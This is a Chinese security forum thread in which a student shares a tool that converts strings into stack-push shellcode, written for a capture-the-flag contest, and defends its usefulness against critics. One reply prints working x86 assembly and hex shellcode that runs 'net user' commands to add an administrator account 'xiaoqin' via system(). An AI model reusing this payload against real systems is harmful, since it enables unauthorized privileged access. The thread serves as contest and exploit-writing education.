能力值:
( LV9,RANK:140 )
|
-
-
2 楼
希望大家编写shellcode愉快!
|
能力值:
( LV8,RANK:120 )
|
-
-
3 楼
支持 
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
支持楼主,强大 
|
能力值:
![]()
(RANK:110 )
|
-
-
5 楼
支持。顶ls
|
能力值:
( LV2,RANK:10 )
|
-
-
6 楼
惊现神器? 前排膜拜下...
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
个人站点 中南民族大学....
|
能力值:
( LV7,RANK:100 )
|
-
-
8 楼
个人站点,碉堡了
|
能力值:
( LV2,RANK:10 )
|
-
-
9 楼
LZ 中南民族大学校长?
|
能力值:
( LV2,RANK:10 )
|
-
-
10 楼
好东西,支持
|
能力值:
( LV9,RANK:140 )
|
-
-
11 楼
亲,这个只是域名指向而已。中国的所有高校域名都是 .edu.cn 。。。
最近生活困难没钱买空间,域名暂时指向学校服务器攒点网站pr值.........
|
能力值:
( LV2,RANK:10 )
|
-
-
12 楼
支持原创 支持分享 下载收藏
|
能力值:
( LV3,RANK:20 )
|
-
-
13 楼
个人感觉用处不大呢。。。字符串转换成了ascii码,metasploit有工具的。。。
|
能力值:
( LV9,RANK:140 )
|
-
-
14 楼
兄弟,不懂不要泼冷水,工具要的是实用、方便,要的不是功能多,
metasploit pro渗透专业、功能多,300Mb大小,可以同时扫描10个以上漏洞等诸多功能,
我没必要用这个庞大的软件写shellcode,
“个人感觉用处不大呢。。。字符串转换成了ascii码”亲,自己动手试试看写shellcode
字符串自己手动写的效果!
|
能力值:
( LV3,RANK:20 )
|
-
-
15 楼
https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
|
能力值:
( LV9,RANK:140 )
|
-
-
16 楼
亲,你的e文链接地址我快速浏览了一下,shellcode编写教程这个不用给我看,
《黑客之道:漏洞发掘之路》书我看过,对这些很了解!
因为下午有2节课和2节实验课没时间把文章认真看完,
我这个小工具如果觉得不适合你那你可以用其它工具,工具在于你会使用它,而方便自己。
|
能力值:
( LV3,RANK:20 )
|
-
-
17 楼
你的工具本来就完成了这么点功能,没你说的那么玄。
原来还是学生啊,看到你帖子署名在绿盟我才回了个帖的。
还有,不要乱指责别人不懂乱说。
|
能力值:
( LV9,RANK:140 )
|
-
-
18 楼
对的,就这么点功能,工具要的是实用、方便,要的不是摆设的功能。
此工具虽然简单,但是在编写shellcode时确实很方便快速,一点没说错!
没有指责你的意思,按事实说话。
你说的“个人感觉用处不大呢。。。字符串转换成了ascii码.......”
注意,这里的栈存储字符串的过程就是一个费时费精力的体力活 。
在shellcode中把数据放到栈中用并得到在栈内存中存放的地址,
你想转为汇编指令格式需要反向倒序每4个字节读取ascii码,
然后依次push入栈,当你辛苦干完体力活调试的时候突然发现当时眼花重复写了一个ascii值,
好,那你又得从头来一次,浪费时间不说还浪费精力,小心的读取每4个字节再反序后push,
看小心对比看是多写了还是少写个字节.......
这个工具的好处在于快速把这段字符串完整放到栈内存并得到内存地址,
比如你要执行这样的指令,system("cmd /c net user xiaoqin /add&net localgroup administrators xiaoqin /add");
好,首先这个shellcode的systemcall需要一个字符串参数,
首先要push 参数, 然后就是call xxxxxxxx
参数在哪里?么有全局变量的内存给你怎么办?
工具生成asm格式的就可以快速搞定,
push 0x00646461
push 0x2f206e69
push 0x716f6169
push 0x78207372
push 0x6f746172
push 0x7473696e
push 0x696d6461
push 0x2070756f
push 0x72676c61
push 0x636f6c20
push 0x74656e26
push 0x6464612f
push 0x206e6971
push 0x6f616978
push 0x20726573
push 0x75207465
push 0x6e20632f
push 0x20646d63
push esp // 字符串参数的内存地址压栈
call xxxxxxxx // call system address
以上是快速生成汇编格式,
如果想一步生成shellcode, 点击生成HEX格式, 或者说是C格式正确些,
得到如下的机器码:
"\x68\x61\x64\x64\x00"
"\x68\x69\x6E\x20\x2F"
"\x68\x69\x61\x6F\x71"
"\x68\x72\x73\x20\x78"
"\x68\x72\x61\x74\x6F"
"\x68\x6E\x69\x73\x74"
"\x68\x61\x64\x6D\x69"
"\x68\x6F\x75\x70\x20"
"\x68\x61\x6C\x67\x72"
"\x68\x20\x6C\x6F\x63"
"\x68\x26\x6E\x65\x74"
"\x68\x2F\x61\x64\x64"
"\x68\x71\x69\x6E\x20"
"\x68\x78\x69\x61\x6F"
"\x68\x73\x65\x72\x20"
"\x68\x65\x74\x20\x75"
"\x68\x2F\x63\x20\x6E"
"\x68\x63\x6D\x64\x20"
"\x54" // push esp 参数的内存地址压栈
然后就是call了
"\xB8\xC7\x93\xBF\x77" // call system api了
这样就一步快速完成shellcode的子过程调用,节约了自己大量工作时间。
而system api的地址不是凭空就有的,
根据自己的需求你可以直接硬地址load或者peb寻址得到load,然后加载模块
load过程跟上面是一样的,一键快速完成!
|
能力值:
( LV2,RANK:10 )
|
-
-
19 楼
我是支持楼主的。。下了。。。。。。。。谢谢。
|
能力值:
( LV2,RANK:10 )
|
-
-
20 楼
.net的看来没戏了 shellcode。。。只能远观了
|
能力值:
( LV13,RANK:260 )
|
-
-
21 楼
哎.....
|
能力值:
( LV2,RANK:10 )
|
-
-
22 楼
mark
字数补丁.exe
|
能力值:
( LV5,RANK:60 )
|
-
-
23 楼
软件和人都还待成熟把……
人家说没什么用处那就没什么用处嘛……
如果你以后有个软件是花了一俩年心血的时间写出来的,放出来共享时也会有人说对他没什么用处的
|
能力值:
( LV9,RANK:140 )
|
-
-
24 楼
这年头共享也是一件很纠结的事情,
这个小工具其实是我这段时间在做绿盟科技杯第九届信息安全与对抗竞赛时,
溢出关要写shellcode,为了方便做题而写的。
共享出来大家一起用,没啥技术含量,
觉得方便大家就收下,如果觉得没有用那就算了,我自己用
|
|
|
|
